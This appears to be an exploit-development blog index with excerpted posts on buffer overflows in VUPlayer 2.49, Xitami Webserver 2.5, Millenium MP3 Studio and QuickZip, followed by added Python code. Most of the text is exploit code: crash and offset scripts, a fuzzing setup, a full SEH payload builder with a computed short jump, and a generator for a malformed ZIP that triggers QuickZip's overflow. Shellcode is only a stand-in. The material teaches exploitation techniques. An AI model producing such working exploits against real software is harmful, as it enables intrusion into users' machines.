We'll work on VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass) for this article.

Initial exploit v1: EIP control

```python
import sys
import struct
import os

crash_file = "test.m3u"

fuzz = "A" * 1012                  # filler up to the saved return address
fuzz += "B" * 4                    # these 4 bytes land in EIP
fuzz += "C" * (3000 - len(fuzz))   # pad the file out to 3000 bytes

file = open(crash_file, "w")
file.write(fuzz)
file.close()
```

Start the app and attach to Immunity. Drag the m3u file on… Continue reading ROP Gadgets: VirtualProtect()
Category: Exploit Dev
Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Fuzzing

GET HTTP request (saved as get.txt):

```http
GET / HTTP/1.1
Host: 192.168.1.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMT
Cache-Control: max-age=0
```

Create a fuzzing script with boo-gen from the saved HTTP request:

```
python boo-gen.py get.txt
```

Vulnerable header: If-Modified-Since: Wed, <fuzzing-payload>

```python
s_string("If-Modified-Since: Sat,", name="If-Modified-Since", fuzzable=False)
s_delim(" ", name="space-10", fuzzable=False)
```

s_string("15 Jun 2019 01:36:09… Continue reading Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter
Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
Crash

```python
#!/usr/bin/python
file = "kalisa.mpf"
buffer = "http://" + "A" * 5000
f = open(file, 'w')
f.write(buffer)
f.close()
```

Offset

```python
#!/usr/bin/python
file = "kalisa.mpf"
buffer = "http://" + "A" * 4105 + "B" * 4 + "C" * 1000
f = open(file, 'w')
f.write(buffer)
f.close()
```

pop-pop-ret

Stack:

- nseh (4 bytes)
- seh (4 bytes)
- other (4 bytes)
- other (4 bytes)
- other (4 bytes)
- other (4 bytes)
- hole (4 bytes)
- other (4 bytes)
- shellcode starts here

So "jmp… Continue reading Exploit Development: Millenium MP3 Studio – SEH (WinDBG)
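The stack layout above is the heart of the SEH technique: once pop-pop-ret returns into nSEH, the 4 bytes sitting there have to carry a short jump that clears the SEH field and whatever lies between it and the shellcode. The following Python is an added example, not code from the post: it computes that jump from the layout instead of hand-encoding it, and decodes it back out to check where control actually lands. It assumes the 4105-byte run from the offset script ends exactly at nSEH; the handler address 0x42424242 and the 4-byte hole after SEH are placeholders, not values from the page.

```python
import struct

PREFIX = b"http://"       # the .mpf trigger used on the page
OFFSET_TO_NSEH = 4105     # the page's 4105-byte run; assumed here to end at nSEH
SEH_HANDLER = 0x42424242  # placeholder for the pop-pop-ret address (not from the page)
HOLE_AFTER_SEH = 4        # assumed number of bytes between SEH and the shellcode


def short_jmp(skip: int) -> bytes:
    """Fill the 4-byte nSEH slot with a `jmp short` that skips the `skip`
    bytes following the slot (the SEH field plus any hole).

    EB rel8 is relative to the end of the 2-byte instruction, so the two
    NOPs that pad the slot are part of the distance jumped.
    """
    disp = skip + 2
    if not -128 <= disp <= 127:
        raise ValueError("rel8 cannot reach %d bytes ahead" % skip)
    return b"\xeb" + struct.pack("<b", disp) + b"\x90\x90"


def build_payload(shellcode: bytes) -> bytes:
    """Lay out filler, nSEH (short jump), SEH (handler), hole, shellcode."""
    nseh = short_jmp(4 + HOLE_AFTER_SEH)          # skip SEH field + hole
    seh = struct.pack("<I", SEH_HANDLER)          # little-endian handler address
    return (PREFIX + b"A" * OFFSET_TO_NSEH + nseh + seh
            + b"\x90" * HOLE_AFTER_SEH + shellcode)


def resolve_jump(buf: bytes) -> int:
    """Decode the jmp short in the nSEH slot and return the buffer index
    execution reaches after pop-pop-ret returns into nSEH."""
    nseh_at = len(PREFIX) + OFFSET_TO_NSEH
    if buf[nseh_at] != 0xEB:
        raise ValueError("nSEH slot does not hold jmp short")
    disp = struct.unpack_from("<b", buf, nseh_at + 1)[0]
    return nseh_at + 2 + disp


if __name__ == "__main__":
    shellcode = b"\xcc" * 32   # constructed stand-in; a real payload goes here
    buf = build_payload(shellcode)
    assert buf[resolve_jump(buf):].startswith(shellcode)
    with open("kalisa.mpf", "wb") as fh:
        fh.write(buf)
```

If the gap between SEH and the shellcode grows past 125 bytes, `short_jmp` refuses rather than silently wrapping the displacement, which is the point at which a two-stage jump or an egghunter becomes necessary.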
SEH + Egghunter QuickZip Exploit
Initial Script

```python
#!/usr/bin/python
# Local file header: version 2.0, no flags, stored, DOS time/date,
# CRC 0, sizes 0, filename length 0x0fe4 (4068), no extra field
header_1 = (b"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")
# Central directory entry for the same file (filename length 0x0fe4 again,
# local header offset 0)
header_2 = (b"\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00"
            b"\x24\x00\x00\x00\x00\x00\x00\x00")
# End of central directory: 1 entry, central directory size 0x1012 (4114),
# central directory offset 0x1002 (4098)
header_3 = (b"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
            b"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

payload = b"A" * 4064
payload += b".txt"

exploit = header_1 + payload + header_2 + payload + header_3

myfile = open('kalisa.zip', 'wb')   # binary mode: the headers contain raw bytes
myfile.write(exploit)
myfile.close()
```

Crash

Open the zip file, attach Immunity, try to extract (where the crash happens).

Offset

SEH Chain

After Shift + F9

SEH chain again

Offset

EIP Control

POP-POP-RET… Continue reading SEH + Egghunter QuickZip Exploit
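The hand-built headers above hardcode the filename length (0x0fe4 = 4068 = 4064 + len(".txt")) and the central-directory size and offset (0x1012 and 0x1002); change the payload length and those fields no longer agree, and the archiver may reject the file before the vulnerable path is reached. The following Python is an added example, not code from the post: it builds the same single-entry stored archive with every length and offset computed from the filename, and reads them back through the standard library to confirm the archive still parses. The DOS time/date words are the ones from the page's headers; everything else is computed.

```python
import io
import struct
import zipfile

# DOS time/date words carried over from the page's headers (b"\xB7\xAC", b"\xCE\x34").
DOS_TIME = 0xACB7
DOS_DATE = 0x34CE


def build_zip(name: bytes) -> bytes:
    """Return a stored (method 0) ZIP with one empty entry named `name`.

    Every length and offset field is derived from len(name), so the
    archive stays structurally valid for any filename length tried.
    """
    if len(name) > 0xFFFF:
        raise ValueError("filename length field is 16 bits")
    # Local file header (30 bytes): signature, version needed (2.0), flags,
    # method, time, date, CRC-32, compressed size, uncompressed size,
    # filename length, extra field length.
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, 0, 0,
                        DOS_TIME, DOS_DATE, 0, 0, 0, len(name), 0) + name
    # Central directory entry (46 bytes): signature, version made by,
    # version needed, flags, method, time, date, CRC-32, sizes, filename /
    # extra / comment lengths, disk number, internal attrs, external attrs,
    # offset of the local header (0: it is the first thing in the file).
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, 0, 0,
                          DOS_TIME, DOS_DATE, 0, 0, 0, len(name), 0, 0, 0,
                          1, 0x24, 0) + name
    # End of central directory (22 bytes): signature, this disk, disk with
    # the CD, entries on this disk, total entries, CD size, CD offset,
    # comment length.
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1,
                       len(central), len(local), 0)
    return local + central + eocd


def zip_fields(data: bytes) -> dict:
    """Read the size/offset fields back and let the stdlib parser confirm
    the archive is well-formed (it raises BadZipFile if not)."""
    local_name_len = struct.unpack_from("<H", data, 26)[0]
    cd_size, cd_offset = struct.unpack_from("<II", data, len(data) - 22 + 12)
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    return {"local_name_len": local_name_len, "cd_size": cd_size,
            "cd_offset": cd_offset, "names": names}


if __name__ == "__main__":
    # The page's trigger: 4064 bytes of padding plus a .txt extension.
    data = build_zip(b"A" * 4064 + b".txt")
    info = zip_fields(data)
    print(info["local_name_len"], hex(info["cd_size"]), hex(info["cd_offset"]))
    with open("kalisa.zip", "wb") as fh:
        fh.write(data)
```

With the page's 4068-byte name the builder reproduces the hardcoded headers byte for byte; with any other length it emits the matching fields, which is what you want when hunting the exact offset.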